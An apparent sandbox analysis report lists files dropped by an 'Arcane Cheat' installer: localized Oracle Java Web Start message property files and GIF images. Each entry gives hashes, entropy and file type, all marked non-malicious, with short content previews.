                                Preview:#..# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=\u5167\u90E8\u932F\u8AA4\uFF0C\u4E0D\u660E\u7684\u8A0A\u606F..error.badinst.nojre=\u5B89\u88DD\u932F\u8AA4\u3002\u5728\u7D44\u614B\u6A94\u4E2D\u627E\u4E0D\u5230 JRE..error.launch.execv=\u547C\u53EB Java Web Start (execv) \u6642\u9047\u5230\u932F\u8AA4..error.launch.sysexec=\u547C\u53EB Java Web Start (SysExec) \u6642\u9047\u5230\u932F\u8AA4..error.listener.failed=Splash: sysCreateListenerSocket \u5931\u6557..error.accept.failed=Splash: \u63A5\u53D7\u5931\u6557..error.recv.failed=Splash: recv \u5931\u6557..error.invalid.port=Splash: \u6709\u6548\u7684\u9023\u63A5\u57E0\u5C1A\u672A\u56DE\u5FA9..error.read=\u8B80\u53D6\u8D85\u51FA\u7DE9\u885D\u5340\u7D50\u5C3E..error.xmlparsing=XML \u5256\u6790\u932F\u8AA4: \u627E\u5230\u932F\u8AA4\u7684\u8A18\u865F\u7A2E\u985E..error.splash.exit=Java Web Start \u9583\u73FE\u87A2

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\is-K1E6H.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 320 x 139
                                Category:dropped
                                Size (bytes):7805
                                Entropy (8bit):7.877495465139721
                                Encrypted:false
                                SSDEEP:96:S88k2wenvMs3iHrSI3yy73VWOcaJpGvrrXqJBcqgbf5bD0jmzDBoqCN2IWsyh:SFHhs73n73V4airrXq41Ll3vBmN2YU
                                MD5:9E8F541E6CEBA93C12D272840CC555F8
                                SHA1:8DEF364E07F40142822DF84B5BB4F50846CB5E4E
                                SHA-256:C5578AC349105DE51C1E9109D22C7843AAB525C951E312700C73D5FD427281B9
                                SHA-512:2AB06CAE68DEC9D92B66288466F24CC25505AF954FA038748D6F294D1CFFB72FCC7C07BA8928001D6C487D1BF71FE0AF1B1AA0F35120E5F6B1B2C209BA596CE2
                                Malicious:false
                                Preview:GIF89a@...................................{...........c.....P|.l.....].............Ry.........S{.i.....U~........................uuuV..b........T.....WWW}..R~.......Hr.v..T|.It..........n.............e..f.....].........Hq.`........Y.....i..r.._..l...........]..Y.....v..................s..f.....z.....\........Jr.r.....................i..e.....p.....Y..m........Z..Sz.Ow....Y..Nx.{..w..Jr.T..R}....Pw.Lt.s..`..W..W..Lv...........................................FFF...W..V..Is.Kv.W..W..U..Hr.O{.Mx.Jt.Gq.Fp.Gp.Lw.Fo.U..T..Q~.R..P|.Lw.S..S..Ju.Nz.V..X..V..U..Ny.Hs.My.Ku.My.Q}.R~.P}.Q}.R..S..S..O{.Oz.Lx.Nz.Lv.It.Gp.Gq....ggg.....................S...............S|....Gp........Mw.S~.Px.Nz.Pz.......Lt.Kv.a.....V.....r.................Fo.......!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02 "> <rdf:RDF xmlns:rdf="ht

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\is-LMLB3.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1857), with CRLF line terminators
                                Category:dropped
                                Size (bytes):4104
                                Entropy (8bit):5.04197285715923
                                Encrypted:false
                                SSDEEP:96:Me7R8zl0Zf4z3X4Gv2hEpeStEKADydYL1WfK0eSm91j7:1R8pOfWHJvOJT1WPtK1j7
                                MD5:823D1F655440C3912DD1F965A23363FC
                                SHA1:50B941A38B9C5F565F893E1E0824F7619F51185C
                                SHA-256:86663DED105B77261C0556468A93BC8666A094B918299A61AF0A8E30F42019C7
                                SHA-512:1EBF989D2121CF05FFC912B9B228C4D4523763EB1A689EC74568D811C88DCF11032FFC8007BB24DAF7D079B580662B77D94B4B8D71A2E891EF27979FF32CD727
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=\u5185\u90E8\u9519\u8BEF, \u672A\u77E5\u6D88\u606F..error.badinst.nojre=\u9519\u8BEF\u5B89\u88C5\u3002\u914D\u7F6E\u6587\u4EF6\u4E2D\u627E\u4E0D\u5230 JRE..error.launch.execv=\u8C03\u7528 Java Web Start (execv) \u65F6\u9047\u5230\u9519\u8BEF..error.launch.sysexec=\u8C03\u7528 Java Web Start (SysExec) \u65F6\u9047\u5230\u9519\u8BEF..error.listener.failed=\u542F\u52A8\u5C4F\u5E55: sysCreateListenerSocket \u5931\u8D25..error.accept.failed=\u542F\u52A8\u5C4F\u5E55: \u63A5\u53D7\u5931\u8D25..error.recv.failed=\u542F\u52A8\u5C4F\u5E55: recv \u5931\u8D25..error.invalid.port=\u542F\u52A8\u5C4F\u5E55: \u672A\u6062\u590D\u6709\u6548\u7AEF\u53E3..error.read=\u8BFB\u53D6\u8D85\u51FA\u7F13\u51B2\u533A\u7ED3\u5C3E..error.xmlparsing=XML \u89E3\u6790\u9519\u8BEF: \u53D1\u73B0\u9519\u8BEF\u7684\u6807\u8BB0\u7C7B\u578B..error.s

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\is-NCSTA.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 640 x 278
                                Category:dropped
                                Size (bytes):15276
                                Entropy (8bit):7.949850025334252
                                Encrypted:false
                                SSDEEP:192:onqkbSDLFgIBL0IgyZCE/oIuuemXclVO/HemZ8GbRdziHm6tIclW3ZYvvebtssZn:lKMLWkpgy8sdsnOmEyPLaYoauAdI
                                MD5:CB81FED291361D1DD745202659857B1B
                                SHA1:0AE4A5BDA2A6D628FAC51462390B503C99509FDC
                                SHA-256:9DD5CCD6BDFDAAD38F7D05A14661108E629FDD207FC7776268B566F7941E1435
                                SHA-512:4A383107AC2D642F4EB63EE7E7E85A8E2F63C67B41CA55EBAE56B52CECFE8A301AAF14E6536553CBC3651519DB5C10FC66588C84C9840D496F5AE980EF2ED2B9
                                Malicious:false
                                Preview:GIF89a..............................................FFF...W..V..Is.Hr.W..W..U..P|.T..Kv.O{.V..Mx....S..Fp.Jt.Lw.Gp.Gq.Lw.U..T..R..Q~.Fo.Nz.R~.R..Q}.My.Ju.It.Oz.Gp.Nz.Gq.V..Ny.Hq.P|.P}.S..S..S..Q}.Ku.Ku.Hr.Lx.X..Mx.It.U..Is.Hs.T..O{.R~.T..O{.Kv.My.Lv..........i...........]..WWWu...........ggguuut.......................................Ry.......{..............b..........................^..l.................X}....a..{.....c..................v..m........T{.f.....l........X.........................j..U|...........`........j..g..U~........^.....Qz.Jr.Nw.p.....v.....p.....Gp....r..Mt.......y..q.....]..Nv............Tz.Y.....[.....Pw....Ox..............X.....Y..X..W..V..S|............Mx....Mv.Kt.U..Hq.Lv.W.....Mu.i..Q{.Gq.Lt.S~.T..U..Kv................Fo.......!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="ht

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\is-NGOVH.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1729), with CRLF line terminators
                                Category:dropped
                                Size (bytes):3784
                                Entropy (8bit):5.17620120701776
                                Encrypted:false
                                SSDEEP:96:wMWzQq8x9i7zO/JOFtUtQzy+gawZFomWdYQCfQ/ydQCyA:LWzQqms7S/JDtQcJoHWQaQ/6QCH
                                MD5:4287D97616F708E0A258BE0141504BEB
                                SHA1:5D2110CABBBC0F83A89AEC60A6B37F5F5AD3163E
                                SHA-256:479DC754BD7BFF2C9C35D2E308B138EEF2A1A94CF4F0FC6CCD529DF02C877DC7
                                SHA-512:F273F8D501C5D29422257733624B5193234635BD24B444874E38D8D823D728D935B176579D5D1203451C0CE377C57ED7EB3A9CE9ADCB3BB591024C3B7EE78DCD
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=\u5167\u90E8\u932F\u8AA4\uFF0C\u4E0D\u660E\u7684\u8A0A\u606F..error.badinst.nojre=\u5B89\u88DD\u932F\u8AA4\u3002\u5728\u7D44\u614B\u6A94\u4E2D\u627E\u4E0D\u5230 JRE..error.launch.execv=\u547C\u53EB Java Web Start (execv) \u6642\u9047\u5230\u932F\u8AA4..error.launch.sysexec=\u547C\u53EB Java Web Start (SysExec) \u6642\u9047\u5230\u932F\u8AA4..error.listener.failed=Splash: sysCreateListenerSocket \u5931\u6557..error.accept.failed=Splash: \u63A5\u53D7\u5931\u6557..error.recv.failed=Splash: recv \u5931\u6557..error.invalid.port=Splash: \u6709\u6548\u7684\u9023\u63A5\u57E0\u5C1A\u672A\u56DE\u5FA9..error.read=\u8B80\u53D6\u8D85\u51FA\u7DE9\u885D\u5340\u7D50\u5C3E..error.xmlparsing=XML \u5256\u6790\u932F\u8AA4: \u627E\u5230\u932F\u8AA4\u7684\u8A18\u865F\u7A2E\u985E..error.splash.exit=Java Web Start \u9583\u73FE\u87A2

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\is-NJ10N.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1345), with CRLF line terminators
                                Category:dropped
                                Size (bytes):3338
                                Entropy (8bit):4.919780187496773
                                Encrypted:false
                                SSDEEP:48:WvaqyL1nlrDtzh5+VN9JrnjXyv6jq/YgKe1h/KZkCUdr5pAvA1t2CPTOsdIamy:txrj5Snk6+wuir25pAvAv2ITOsd9
                                MD5:FF9CFEE1ACFCD927253A6E35673F1BB7
                                SHA1:957E6609A1AF6D06A45A6F7B278BE7625807B909
                                SHA-256:E130FBD5FA378A380F46F42981F2C97BC152059C27120204AB4DA47079D31513
                                SHA-512:F42601092436D7AF30CCD81126185232D9D643B195D3D4619AEC451E3E2A60E33E6378E770DD1A4CDF7AB20CB749371665A992CA73D2842A7102F3FB34B6B9EB
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=interner Fehler, unbekannte Meldung..error.badinst.nojre=Ung\u00FCltige Installation. Keine JRE in Konfigurationsdatei gefunden..error.launch.execv=Fehler beim Aufrufen von Java Web Start (execv) aufgetreten..error.launch.sysexec=Fehler beim Aufrufen von Java Web Start (SysExec) aufgetreten..error.listener.failed=Startbildschirm: sysCreateListenerSocket nicht erfolgreich..error.accept.failed=Startbildschirm: accept nicht erfolgreich..error.recv.failed=Startbildschirm: recv nicht erfolgreich..error.invalid.port=Startbildschirm: Reaktivierung eines g\u00FCltigen Ports nicht m\u00F6glich..error.read=\u00DCber Pufferende hinaus gelesen..error.xmlparsing=XML-Parsefehler: Falscher Tokentyp gefunden..error.splash.exit=Prozess f\u00FCr Startbildschirm von Java Web Start wird beendet.....\n..# "Last WinSock Error" mean

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\is-OAA9U.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1319), with CRLF line terminators
                                Category:dropped
                                Size (bytes):3317
                                Entropy (8bit):4.869662880084367
                                Encrypted:false
                                SSDEEP:48:3c6BeKTDcUsLYg9tStwmx+supWBxKy0HgKe1u6K0NCMc6MTNTjtA7NZdlw7ZHAW:3c6fbEf1mxPuUBxKy4va+mZdlw7Z7
                                MD5:4078691AB22C4F0664856BE0C024A52F
                                SHA1:6247FC05DE429F65DC4E1356C4715DC51F43B98F
                                SHA-256:6869B27B12B99C9D169B3E018284BE0F7631DBDF2DDD5F4EA5B1A458736FDFDF
                                SHA-512:BB02765F69E23C732C790EB994800C83BB8EFE7FF8CE0BCDC475EC5A29CEF5A33A5513AB1A7DC9F0F066B807A0980C41EC0037710873A32BD2952DBED79D24CA
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2016, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=erro interno, mensagem desconhecida..error.badinst.nojre=Instala\u00E7\u00E3o incorreta. Nenhum JRE encontrado no arquivo de configura\u00E7\u00E3o..error.launch.execv=Erro encontrado ao chamar Java Web Start (execv)..error.launch.sysexec=Erro encontrado ao chamar Java Web Start (SysExec) ..error.listener.failed=Tela Inicial: falha em sysCreateListenerSocket..error.accept.failed=Tela Inicial: falha na fun\u00E7\u00E3o accept..error.recv.failed=Tela Inicial: falha na fun\u00E7\u00E3o recv..error.invalid.port=Tela Inicial: n\u00E3o reativou uma porta v\u00E1lida..error.read=Ler ap\u00F3s o final do buffer..error.xmlparsing=Erro durante o parsing de XML: tipo incorreto de token encontrado..error.splash.exit=Saindo do processamento da tela inicial do Java Web .....\n..# "Last WinSock Error" means the error message

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\is-V6B2J.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1475), with CRLF line terminators
                                Category:dropped
                                Size (bytes):3632
                                Entropy (8bit):4.776451902180833
                                Encrypted:false
                                SSDEEP:96:KHelXJn5woLUosi30hrleaRSfvlBY0CQ1Z:KHelNTAxFtlE/71Z
                                MD5:72BDAE07C5D619E5849A97ACC6A1090F
                                SHA1:9FC8A7A29658AC23A30AB9D655117BB79D08DC3B
                                SHA-256:821A3452ECB9F29BCEC16C0B39FB668C2CC30C7F7283B34BFC5400040723892B
                                SHA-512:67F0D1D60012B5598864B68612AA488AF1B5876FF5F347CD98ABCF1E3C0D267CF0354D5085BF12B0A09C6EF124FD0117CD16FCC032DA2B195D45BAB19740BB78
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=Error interno, mensaje desconocido..error.badinst.nojre=Instalaci\u00F3n incorrecta. No se ha encontrado JRE en el archivo de configuraci\u00F3n..error.launch.execv=Se ha encontrado un error al llamar a Java Web Start (execv)..error.launch.sysexec=Se ha encontrado un error al llamar a Java Web Start (SysExec) ..error.listener.failed=Pantalla de Presentaci\u00F3n: fallo de sysCreateListenerSocket..error.accept.failed=Pantalla de Presentaci\u00F3n: fallo de accept..error.recv.failed=Pantalla de Presentaci\u00F3n: fallo de recv..error.invalid.port=Pantalla de Presentaci\u00F3n: no se ha activado un puerto v\u00E1lido..error.read=Lectura m\u00E1s all\u00E1 del final del buffer..error.xmlparsing=Error de an\u00E1lisis de XML: se ha encontrado un tipo de token no v\u00E1lido..error.splash.exit=Saliendo del proceso d

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\messages.properties (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):2917
                                Entropy (8bit):4.838706790124659
                                Encrypted:false
                                SSDEEP:48:KaDMJ9TmsHDmDDCDP2un8YzgKe1E13Tstub22tTeF/Qi/WRtAXikTzgaENZzT3JI:KaD+9TmAe29vBotubbt2Oz+ENlbJI
                                MD5:2EB9117D147BAA0578E4000DA9B29E12
                                SHA1:3D297ECF3D280D4AA3D1423E885994495243F326
                                SHA-256:B8D9C69FF7F4832A9B365D4A43CF66DFF9847051752B13EEDF024CAA9C1EF46B
                                SHA-512:C3F7730767941B3C8F6F53D4686E9F898D1907D978F6D1FA35BA02C3FCD8306335406A5F9ABAA844F27F7AFD9E548810BECB9EC3E6B84888EA5EAC57B6ED6FDB
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2011, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=internal error, unknown message..error.badinst.nojre=Bad installation. No JRE found in configuration file..error.launch.execv=Error encountered while invoking Java Web Start (execv)..error.launch.sysexec=Error encountered while invoking Java Web Start (SysExec) ..error.listener.failed=Splash: sysCreateListenerSocket failed..error.accept.failed=Splash: accept failed..error.recv.failed=Splash: recv failed..error.invalid.port=Splash: didn't revive a valid port..error.read=Read past end of buffer..error.xmlparsing=XML Parsing error: wrong kind of token found..error.splash.exit=Java Web Start splash screen process exiting .....\n..# "Last WinSock Error" means the error message for the last operation that failed...error.winsock=\tLast WinSock Error: ..error.winsock.load=Couldn't load winsock.dll..error.winsock.start

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\messages_de.properties (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1345), with CRLF line terminators
                                Category:dropped
                                Size (bytes):3338
                                Entropy (8bit):4.919780187496773
                                Encrypted:false
                                SSDEEP:48:WvaqyL1nlrDtzh5+VN9JrnjXyv6jq/YgKe1h/KZkCUdr5pAvA1t2CPTOsdIamy:txrj5Snk6+wuir25pAvAv2ITOsd9
                                MD5:FF9CFEE1ACFCD927253A6E35673F1BB7
                                SHA1:957E6609A1AF6D06A45A6F7B278BE7625807B909
                                SHA-256:E130FBD5FA378A380F46F42981F2C97BC152059C27120204AB4DA47079D31513
                                SHA-512:F42601092436D7AF30CCD81126185232D9D643B195D3D4619AEC451E3E2A60E33E6378E770DD1A4CDF7AB20CB749371665A992CA73D2842A7102F3FB34B6B9EB
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=interner Fehler, unbekannte Meldung..error.badinst.nojre=Ung\u00FCltige Installation. Keine JRE in Konfigurationsdatei gefunden..error.launch.execv=Fehler beim Aufrufen von Java Web Start (execv) aufgetreten..error.launch.sysexec=Fehler beim Aufrufen von Java Web Start (SysExec) aufgetreten..error.listener.failed=Startbildschirm: sysCreateListenerSocket nicht erfolgreich..error.accept.failed=Startbildschirm: accept nicht erfolgreich..error.recv.failed=Startbildschirm: recv nicht erfolgreich..error.invalid.port=Startbildschirm: Reaktivierung eines g\u00FCltigen Ports nicht m\u00F6glich..error.read=\u00DCber Pufferende hinaus gelesen..error.xmlparsing=XML-Parsefehler: Falscher Tokentyp gefunden..error.splash.exit=Prozess f\u00FCr Startbildschirm von Java Web Start wird beendet.....\n..# "Last WinSock Error" mean

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\messages_es.properties (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1475), with CRLF line terminators
                                Category:dropped
                                Size (bytes):3632
                                Entropy (8bit):4.776451902180833
                                Encrypted:false
                                SSDEEP:96:KHelXJn5woLUosi30hrleaRSfvlBY0CQ1Z:KHelNTAxFtlE/71Z
                                MD5:72BDAE07C5D619E5849A97ACC6A1090F
                                SHA1:9FC8A7A29658AC23A30AB9D655117BB79D08DC3B
                                SHA-256:821A3452ECB9F29BCEC16C0B39FB668C2CC30C7F7283B34BFC5400040723892B
                                SHA-512:67F0D1D60012B5598864B68612AA488AF1B5876FF5F347CD98ABCF1E3C0D267CF0354D5085BF12B0A09C6EF124FD0117CD16FCC032DA2B195D45BAB19740BB78
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=Error interno, mensaje desconocido..error.badinst.nojre=Instalaci\u00F3n incorrecta. No se ha encontrado JRE en el archivo de configuraci\u00F3n..error.launch.execv=Se ha encontrado un error al llamar a Java Web Start (execv)..error.launch.sysexec=Se ha encontrado un error al llamar a Java Web Start (SysExec) ..error.listener.failed=Pantalla de Presentaci\u00F3n: fallo de sysCreateListenerSocket..error.accept.failed=Pantalla de Presentaci\u00F3n: fallo de accept..error.recv.failed=Pantalla de Presentaci\u00F3n: fallo de recv..error.invalid.port=Pantalla de Presentaci\u00F3n: no se ha activado un puerto v\u00E1lido..error.read=Lectura m\u00E1s all\u00E1 del final del buffer..error.xmlparsing=Error de an\u00E1lisis de XML: se ha encontrado un tipo de token no v\u00E1lido..error.splash.exit=Saliendo del proceso d

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\messages_fr.properties (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1575), with CRLF line terminators
                                Category:dropped
                                Size (bytes):3441
                                Entropy (8bit):4.832330268062187
                                Encrypted:false
                                SSDEEP:48:KE2CXpRLJDNXQC6tNaEGBlu9hUv5//zEvDiwkISAyHgKe1p6KF/uoYuh1LNRtS0f:KERXlp6tN1VHq1Kt1S4x8Xi
                                MD5:FFE3CC16616314296C3262B0A0E093CD
                                SHA1:198DD1C6E6707C10AE74A1C42E8A91C429598F3B
                                SHA-256:3941736BEF6A8E53D002B6B67ECE4793C2F3F34BCC1ECB271684EB3F73FC4103
                                SHA-512:CD3A9329F405CA14E11CDBB74D467B31A31530CBF00537B16FB23AEBC6C07EB268E9624FDBC997AA0CF4852DAC288E1D011E2FC392D71E25DBDF52E359BA9D4E
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2011, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=erreur interne, message inconnu..error.badinst.nojre=Installation incorrecte. JRE introuvable dans le fichier de configuration..error.launch.execv=Erreur lors de l'appel de Java Web Start (execv)..error.launch.sysexec=Erreur lors de l'appel de Java Web Start (SysExec) ..error.listener.failed=Accueil : \u00E9chec de sysCreateListenerSocket..error.accept.failed=Accueil : \u00E9chec d'accept..error.recv.failed=Accueil : \u00E9chec de recv..error.invalid.port=Accueil : impossible de r\u00E9activer un port valide..error.read=Lecture apr\u00E8s la fin de tampon..error.xmlparsing=Erreur d'analyse XML : type incorrect de jeton..error.splash.exit=Le processus d'affichage de l'\u00E9cran d'accueil de Java Web Start est en cours de fermeture...\n..# "Last WinSock Error" means the error message for the last operation that

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\messages_it.properties (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1392), with CRLF line terminators
                                Category:dropped
                                Size (bytes):3255
                                Entropy (8bit):4.7050139579578145
                                Encrypted:false
                                SSDEEP:48:KTi+qOaVUVVMsD/B0FN5+eADELDHxhdpHgKe1uo265eLaqMQ6URhmwgFs+ur60:KJBa2VtzeDLDRhd5A26+7RhZgR0
                                MD5:BF5E5310B2DCF8E8B3697B358AD4446D
                                SHA1:C746AC1F46F607FA8F971BEA2B6853746A4FB28D
                                SHA-256:CC9AD73957535011EE2376C23DE2C2597F877ACEBA9173E822EE79AAD3C4E9E6
                                SHA-512:B6C61D38B0ACC427B9B2F4C19DABD7EACBE8EEA6B973FD31B3555C4C5B3FFAF1CA036B730359346F57223B44CCE79E04A6D06BBC13C6F7DD26ED463776BB6DCC
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2011, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=errore interno, messaggio sconosciuto..error.badinst.nojre=Installazione errata. Impossibile trovare il JRE nel file di configurazione..error.launch.execv=Errore durante la chiamata di Java Web Start (execv)..error.launch.sysexec=Errore durante la chiamata di Java Web Start (SysExec) ..error.listener.failed=Apertura: sysCreateListenerSocket non riuscito..error.accept.failed=Apertura: accept non riuscito..error.recv.failed=Apertura: recv non riuscito..error.invalid.port=Apertura: impossibile identificare una porta valida..error.read=Tentativo di lettura dopo la fine del buffer..error.xmlparsing=Errore durante l'analisi XML: trovato un tipo di token errato..error.splash.exit=Uscita dal processo di schermata iniziale di Java Web Start in corso...\n..# "Last WinSock Error" means the error message for the last oper

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\messages_ja.properties (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (2924), with CRLF line terminators
                                Category:dropped
                                Size (bytes):6381
                                Entropy (8bit):4.5983590678211135
                                Encrypted:false
                                SSDEEP:96:Mu7cepcgD8do+O2D+k8/RJFGQcHGqo72hzEflA44CAmIbIC3j5pN/o8woJe:PctgYqhTYzG2O
                                MD5:D830FC76BDD1975010ECE4C5369DADF8
                                SHA1:D8CC3F54325142EFA740026E2BC623AFE6F3ACB5
                                SHA-256:11E886336BA51A9044AB1A87C60CEEE34C29BB724E06A16968D31531A7001064
                                SHA-512:7B867A50A811FBD7FFDAD0B729CA4501E16386EE5C4940A4CF9A805767CC0D10F7E3BDFD6A60204D79292D778D93E3BD915368AC0E9453BBB1010ADFD9655F0F
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=\u5185\u90E8\u30A8\u30E9\u30FC\u3001\u4E0D\u660E\u306A\u30E1\u30C3\u30BB\u30FC\u30B8..error.badinst.nojre=\u30A4\u30F3\u30B9\u30C8\u30FC\u30EB\u304C\u6B63\u3057\u304F\u3042\u308A\u307E\u305B\u3093\u3002\u69CB\u6210\u30D5\u30A1\u30A4\u30EB\u5185\u306BJRE\u304C\u3042\u308A\u307E\u305B\u3093..error.launch.execv=Java Web Start\u306E\u547C\u51FA\u3057\u4E2D\u306B\u30A8\u30E9\u30FC\u304C\u767A\u751F\u3057\u307E\u3057\u305F(execv)..error.launch.sysexec=Java Web Start\u306E\u547C\u51FA\u3057\u4E2D\u306B\u30A8\u30E9\u30FC\u304C\u767A\u751F\u3057\u307E\u3057\u305F(SysExec) ..error.listener.failed=\u30B9\u30D7\u30E9\u30C3\u30B7\u30E5: sysCreateListenerSocket\u306B\u5931\u6557\u3057\u307E\u3057\u305F..error.accept.failed=\u30B9\u30D7\u30E9\u30C3\u30B7\u30E5: accept\u306B\u5931\u6557\u3057\u307E\u3057\u305F..error.recv.fai

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\deploy\messages_ko.properties (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (2601), with CRLF line terminators
                                Category:dropped
                                Size (bytes):5744
                                Entropy (8bit):4.781504394194986
                                Encrypted:false
                                SSDEEP:96:GhymCk3kjLqgz9RkfrsEW/p9M32i0HkZr+ywc8b8+/moD7yct070DL70Dm:Dm5kLfIErMbT/44in
                                MD5:64DE22212EE92F29BCA3ACED72737254
                                SHA1:C4DBC247043578CCF9CD8DAB652D096703D5B26E
                                SHA-256:292696C94D5FD0BF2FF4AF9E4D363BFCBE888D2E65BD18A20CF71081FB1C9B0D
                                SHA-512:CA33C75B66D8B5316B1C3ED41A9A14DD8611A3BB9B26EFDC7F468250696D515CF1E966831975C9ABDC33E9A1C59167FE79BA547592D2A04997E1342433E7B628
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2016, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=\uB0B4\uBD80 \uC624\uB958\uAC00 \uBC1C\uC0DD\uD588\uC2B5\uB2C8\uB2E4. \uC54C \uC218 \uC5C6\uB294 \uBA54\uC2DC\uC9C0\uC785\uB2C8\uB2E4...error.badinst.nojre=\uC124\uCE58\uAC00 \uC798\uBABB\uB418\uC5C8\uC2B5\uB2C8\uB2E4. \uAD6C\uC131 \uD30C\uC77C\uC5D0\uC11C JRE\uB97C \uCC3E\uC744 \uC218 \uC5C6\uC2B5\uB2C8\uB2E4...error.launch.execv=Java Web Start(execv)\uB97C \uD638\uCD9C\uD558\uB294 \uC911 \uC624\uB958\uAC00 \uBC1C\uC0DD\uD588\uC2B5\uB2C8\uB2E4...error.launch.sysexec=Java Web Start(SysExec)\uB97C \uD638\uCD9C\uD558\uB294 \uC911 \uC624\uB958\uAC00 \uBC1C\uC0DD\uD588\uC2B5\uB2C8\uB2E4. ..error.listener.failed=\uC2A4\uD50C\uB798\uC2DC: sysCreateListenerSocket\uC744 \uC2E4\uD328\uD588\uC2B5\uB2C8\uB2E4...error.accept.failed=\uC2A4\uD50C\uB798\uC2DC: \uC2B9\uC778\uC744 \uC2E4\uD328\uD588\uC2B5\uB2C8\uB2E4...error.r

